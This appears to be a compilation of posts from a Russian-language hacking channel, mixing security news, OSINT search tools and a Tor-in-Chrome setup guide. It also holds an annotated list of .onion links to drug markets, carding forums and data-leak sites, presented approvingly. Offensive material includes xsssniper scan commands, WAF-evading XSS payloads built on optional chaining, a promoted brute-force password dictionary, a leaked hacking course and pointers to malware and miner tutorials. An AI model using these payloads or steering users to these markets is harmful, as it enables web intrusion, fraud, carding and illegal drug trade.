Готовлю еще кучу статей для Вас
Скоро выложу слив обучения от HackerPlace

В ходе вредоносной кибероперации, которую исследователи окрестили «Tag Barnakle», злоумышленники взломали более 120 серверов и внедрили злонамеренный код, перенаправляющий посетителей веб-сайтов на мошеннические ресурсы.

Операцию злоумышленников описали исследователи из компании Confiant. По их словам, они по-прежнему атакуют непропатченные серверы Revive. В частности, в арсенале атакующих имеется эксплойт для известных уязвимостей в Revive.

Сам вредоносный код состоит преимущественно из снятия цифрового отпечатка браузера пользователя, на основе которого активируется редирект на один из мошеннических или злонамеренных сайтов. При перенаправлении жертвы учитываются отдельные параметры: устройство, браузер.

В прошлом году Tag Barnakle атаковала пользователей десктопных версий браузера. Теперь же злоумышленники переключились и на владельцев мобильных устройств, которых отправляют на мошеннические сайты.

По оценкам специалистов Confiant, кампания Tag Barnakle затронула «сотни миллионов пользователей»

Говорят, что тот кто владеет информацией — владеет миром. Современные поисковые системы позволяют нам найти нужную информацию в необъятном пространстве клирнета за считанные секунды. Сегодня вы узнаете о полезных поисковиках, которые действительно лучше, чем лидеры рынка. Пусть и не во всём.

▪️ Not Evil — Ищет там, куда Google, «Яндексу» и другим поисковикам вход закрыт в принципе.
▪️ Pipl — система, предназначенная для поиска информации о конкретном человеке;
▪️ Wolfram | Alpha — вычислительно-поисковая система;
▪️ Carrot2 — определяет объекты или категории привязанные к слову в поисковом запросе;
▪️ Boardreader — поисковик по форумам;
▪️ Searchcode — поиск по коду в открытых репозиториях;
▪️ Intelx — найдет по email, доменам, URL-адресам, IP-адресам, CIDR, btc, хешам IPFS и т.д.
▪️ Kribrum — поиск по социальным сетям;
▪️ Secapps — автоматический поиск и создание карт взаимосвязей;
▪️ Occrp — поиск по базам данных, файлам, реестрам компаний и т.д.

TOR в Google Chrome

Tor — свободное и открытое программное обеспечение для реализации второго поколения так называемой луковой маршрутизации. Это система прокси-серверов, позволяющая устанавливать анонимное сетевое соединение, защищённое от прослушивания.

Если вы очень заботитесь о своей безопасности и анонимности в сети, но не очень хотите устанавливать TOR, прокси и т.д, то специально для вас создано расширение "Kronymous". Оно будет на полностью автоматической и бесплатной основе пропускать весь ваш трафик через TOR.

Kronymous – специальная консоль для установки безопасного соединение.

1) Устанавливаем Kronymous. После запуска появится окно терминала, жмем "START TOR PROXY", ждем пока загрузится. Не закрывайте данное окно во время использования, для удобства сверните.

2) Устанавливаем Proxy SwitchyOmega. Заходим в настройки и заходим в раздел "Proxy". Там выставляем нужные для нашей работы параметры сети "Protocol – SOCKS5, Server –127.0.0.1, Port – 9999". Нажмите Apply changes.

3) На панели инструментов браузера появится значок Proxy SwitchyOmega, кликните на него и активируйте пункт "Proxy".

После всех этих действий, весь ваш трафик будет проходить через сеть TOR, все вкладки будут иметь разный IP. Для отключения Tor в Chrome нужно либо закрыть окно терминала Kronymous, либо нажать на кнопку Proxy Switcher Omega и выбрать прямое соединение

Слив обучения хакингу от Hacker Place Academy 2020

– Хакинг
– Социальная инженерия
– Вирусознание
– Безопасность и анонимность

Список полезных .onion ссылок:
Вся информация на канале предоставлена исключительно в ознакомительных целях! Все что вы делаете - на свой страх и риск

МАГАЗИНЫ
1. http://hydraruzxpnew4af.onion/ - Гидра (да-да, та самая) - самая популярная площадка даркнете. Тут продается все, от наркотиков до анонимных телефон и сканов.

2. http://wayawaytcl3k66fl.onion/ - WayAway - место общения наркоманов и барыг. Продадут вам все, что хотите, только деньги давайте.

3. http://jokerbuzzhyhl5cl.onion/ - Сайт, где за большие деньги сливают информацию.

4. http://lwplxqzvmgu43uff.onion — Огромный склад информации, с огромным множеством разделов, скрытых от глаз обычного посетителя.

5. http://rusilkusru6f57uw.onion — Копия "Silkroad".

6. http://medusas6rqee6x6e.onion - Medusa, Продает сканы, наркоту, подделки. Автогарант. Быстро отвечает поддержка. Отличный автогарант.

ЧАТЫ, ФОРУМЫ
1. http://facebookcorewwwi.onion — Копия Фейсбука, только в Даркнете.

2. http://w363zoq3ylux5rf5.onion/ - Galaxy2 — тут есть тематические разделы, где вы сможете найти единомышленников.

3. http://sms4tor3vcr2geip.onion — после работы, все сообщения удаляются

4. http://onelonhoourmypmh.onion - Onelon — считается одним из самых безопасных сервисов для общения в даркнете.

5. http://blkbook3fxhcsn3u.onion - активный сайт для общения, тут всегда можно найти свежий контент. Современный дизайн - еще одно преимущество.

6. http://tetatl6umgbmtv27.onion — чат, в котором человек, с которым вы будете общаться выбирается на рандом.

7. http://xcm4pbxoaajsqrps.onion — комьюнити OS Kali Linux на темной стороне интернета.

10. http://fncuwbiisyh6ak3i.onion - Отличная социальная сеть с хорошим дизайном.

11. http://7lvd7fa5yfbdqaii.onion — сервис, предназначенный для работы общественных активистов.

12. http://damagelabo2jiykj.onion — Хорошо развитый форум, затрагивающий отрасли хакинга и к@рдинга.

МЕСТА ОБИТАНИЯ ХАКЕРОВ
1. http://oi4bvjslpt5gabjq.onion —Здесь сидят французские хакеры и ломают пентагон, ахахах.

2. http://darksell2cuknuca.onion — огромный каталог проверенных продавцов всего даркнета.

3. http://dark3zzgex3xwmcj.onion — сайт, содержащий гайды по разным действиям в даркнете.

4. http://wwhclublci77vnbi.onion - сообщество русских карьеров

5. http://verified2ebdpvms.onion - Огромный русскоязычный форум, доступ к которому стоит $50.

6. http://crdclub4wraumez4.onion - Очень древний к@рдерский форум с множеством мануалов. Очень хорошо подойдет для новичков.

8. http://kickassugvgoftuk.onion — Зарубежный форум интересной тематики)

СЕРВИСЫ ДЛЯ ПЕРЕДАЧИ ИНФОРМАЦИИ
2. http://torbox3uiot6wchz.onion

ХРАНИЛИЩА ФОТО/ВИДЕО МАТЕРИАЛОВ
1. http://pic2torqdbtzkasl.onion - самый популярный хостинг изображений. Изображение удаляется если её никто не просматривал более 60 дней.

3. http://felixxxboni3mk4a.onion - простой хостинг для изображений (French)

4. http://twlba5j7oo5g4kj5.onion - хороший вариант из-за отсутствия ограничения по времени хранения.

5. http://matrixtxri745dfw.onion - обычный хостинг.

6. http://godaddybqmlicbis.onion - Считается одним из самых удобных хостингов в Даркнете.

9. http://gyklo5wruhin4qpg.onion - анонимный файлдроппер без логов.

10. http://videonwcswhrqynk.onion - YouTube без правил.

Тайминг-атака. Как спецслужбы деанонимизируют пользователей мессенджеров.
Читать статью

TukTuk - это инструмент с открытым исходным кодом, призванный облегчить жизнь пентестеру за счет перехвата и регистрации различных типов запросов. TukTuk написан на Go, но имеет небольшую часть кода Python.
Читать инструкцию

Огромный словарь паролей для брута

Представляю вашему вниманию словарь c 10 МИЛЛИОНАМИ ПАРОЛЕЙ.

Находим xss уязвимости на веб-сайтах

xsssniper - это удобный инструмент, предназначенный для обнаружения и эксплуатации уязвимостей «Межсайтового скриптинга»‎ (XSS) на атакуемых веб-сайтах.

Установка:
$ git clone https://github.com/gbrindisi/xsssniper
$ cd xsssniper

Сканирование URL с параметрами GET:
$ python xsssniper.py -u "http://target.com/index.php?page=test"

Сканирование URL с параметрами POST:
$ python xsssniper.py -u "http://target.com/index.php" --post --data=POST_DATA

Полное сканирование всего сайта:
$ python xsssniper.py -u "http://target.com" --crawl

Продавцы в Telegram получили возможность принимать платежи кредитными картами в любом чате мессенджера без комиссии

- Вася, алло! Товар на месте?
- Да, переводи бабло на 🥝
- Никаких🥝, Дуров сказал надо помогать возвращать деньги инвесторам

Теперь продавцы могут принимать платежи кредитными картами с помощью встроенных платежных систем. Telegram не берет комиссии и не хранит платежную информацию подчеркивается в официальном сообщении компании

🔥 Идея замечательная для обычных владельцев Telegram каналов, но вместе с этим нас ожидает новая волна скама и увеличение оборота торговли различными запрещенными веществами.

https://www.kommersant.ru/doc/4793000

Как работают малвари?
Итак, наша задача — разобраться, как работают современные зловредные приложения. А лучший способ это сделать — посмотреть, как создается похожий софт. Как и боевой зловред, наш пример при желании сможет наблюдать и передавать информацию о целевом устройстве на сервер.
Читать инструкцию

Крипта хайпует. Давайте разберем пример написания собственного майнера
Читать howTo

💉 Инструмент для подбора tamper-скриптов в SQLMap

Atlas - это инструмент с открытым исходным кодом, который может предложить tamper скрипт для sqlmap, чтобы обойти WAF/IDS/IPS. Инструмент полагается на возвращаемый статус код.

Изначально требуется запустить sqlmap с более подробным выводом (опция -v 3) и если полезная нагрузка блокируется WAF/IDS/IPS, то попробовать запустить ее через Atlas, который покажет потенциальные скрипты для обхода средств защиты.

Более подробно о работе инструмента можно узнать на его GitHub странице.

pass: 311138

README inside, plz read it before run BS.

Happy Hacking! 🥳

Большой сборник инструментов, которыми пользуется Bellingcat

#OSINT #soft

🔗 Cовет по обходу фильтрации средств защиты от XSS

Знаете ли вы, что window.alert?.() и (window?.alert)`` будут выдавать всплывающее окно?

?. - это фича, называется optional chaining, и, насколько я могу судить, ее нет практически ни в каких популярных списках полезных нагрузок для XSS.

Обязательно попробуйте это, если вы ищете способы обхода фильтрации средств защиты.

В основном вы можете использовать её где угодно, где бы использовали символы:
. () `` []

Например:

window?.['alert']?.(1)

(window?.['alert'])`1`

выглядят как абсолютное колдовство, но оба работают. Ниже еще несколько примеров:

alert?.(document?.domain)

[document?.domain]?.map?.(alert)

top?.[/ale/?.source+/rt/?.source]?.(document?.[/dom/?.source+/ain/?.source])

#web #xss #waf

Инструменты обеспечения сетевой безопасности и инструменты для проведения тестирования на проникновение чаще всего используются службами безопасности для проведения проверки на наличие уязвимостей в сети и приложениях. В данной статье вы сможете найти всеобъемлющий список инструментов для тестирования на проникновения, который включает в себя проведения пентеста во всех средах.
Читать статью